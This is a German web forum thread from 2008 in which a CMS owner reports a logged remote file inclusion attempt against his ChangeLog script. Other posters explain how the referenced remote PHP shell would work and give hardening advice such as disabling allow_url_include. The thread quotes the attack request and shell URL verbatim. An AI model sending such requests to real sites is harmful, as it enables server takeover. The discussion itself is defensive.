Titel: ChangeLog Angriff
Beitrag von: Powie am 25. Januar 2008, 09:48:21
Beitrag von: Powie am 25. Januar 2008, 09:48:21
Aktuell wird das ChangeLog vom pSys immer häufig angegriffen ![](\"<___base_url___)
/uploads/emoticons/icon_e_smile.gif.4a0acefcb917340d2c82e5239c009e6e.gif\" alt=\":)\" />
der Request sieht genau so aus:
www.powie.de/cms/ChangeLog/index.php?doc=http://www.aneuk.com/test/oke.txt?<
Interessant wenn man sich die vermeintliche Doc mal ansieht:
http://www.aneuk.com/test/oke.txt
der Request sieht genau so aus:
www.powie.de/cms/ChangeLog/index.php?doc=http://www.aneuk.com/test/oke.txt?<
Interessant wenn man sich die vermeintliche Doc mal ansieht:
http://www.aneuk.com/test/oke.txt
Titel: ChangeLog Angriff
Beitrag von: k00ni am 25. Januar 2008, 13:17:07
Beitrag von: k00ni am 25. Januar 2008, 13:17:07
Kann das irgendwann mal zu Problemen führen, wo dann in ein System erfolgreich eingebrochen werden könnte?
Titel: ChangeLog Angriff
Beitrag von: am 25. Januar 2008, 13:44:52
Beitrag von: am 25. Januar 2008, 13:44:52
Kann das irgendwann mal zu Problemen führen, wo dann in ein System erfolgreich eingebrochen werden könnte?[/quote]
http://www.aneuk.com/test/oke.txt ist eine Remote Shell. Wenn:
- die Shell geladen werden kann
- eine der Funktionen passthru, system, popen oder shell_exec verfügbar ist
- register_globals on ist
- Short Tags erlaubt sind
kann man damit beliebige Befehle im Nutzerkontext des Users ausführen, der das Skript ausführt, ausführen.
ChangeLog ist IMHO nicht angreifbar.
Titel: ChangeLog Angriff
Beitrag von: Powie am 25. Januar 2008, 14:03:12
Beitrag von: Powie am 25. Januar 2008, 14:03:12
die Gefahr wäre gegeben bei einem Script mit den von Statler genannten Settings, welches zum Beispiel einfach einen
include($doc);
macht.
Ist nur ein Beispiel aus vielen vielen Einträgen die ich logge. Da wird bei mir auch speziell nach Mambo, Typo, etc. ähnlichen Links gesucht.
include($doc);
macht.
Ist nur ein Beispiel aus vielen vielen Einträgen die ich logge. Da wird bei mir auch speziell nach Mambo, Typo, etc. ähnlichen Links gesucht.
Titel: ChangeLog Angriff
Beitrag von: k00ni am 25. Januar 2008, 15:01:06
Beitrag von: k00ni am 25. Januar 2008, 15:01:06
Könnt ihr gute Infoquellen empfehlen?
Titel: ChangeLog Angriff
Beitrag von: am 25. Januar 2008, 15:15:55
Beitrag von: am 25. Januar 2008, 15:15:55
Ist nur ein Beispiel aus vielen vielen Einträgen die ich logge. Da wird bei mir auch speziell nach Mambo, Typo, etc. ähnlichen Links gesucht.[/quote]
Es gibt noch ein paar Konstrukte mehr, die gefährlich sind. Es empfiehlt sich - neben sorgfältiger Programmierung - allow_url_include zu deaktivieren.
Aber nochmal: Es ist absolut notwendig, sorgfältig zu programmieren.Könnt ihr gute Infoquellen empfehlen?[/quote]
PHP-Sicherheit
Security
shiflett.org
Stefan Esser
Nessus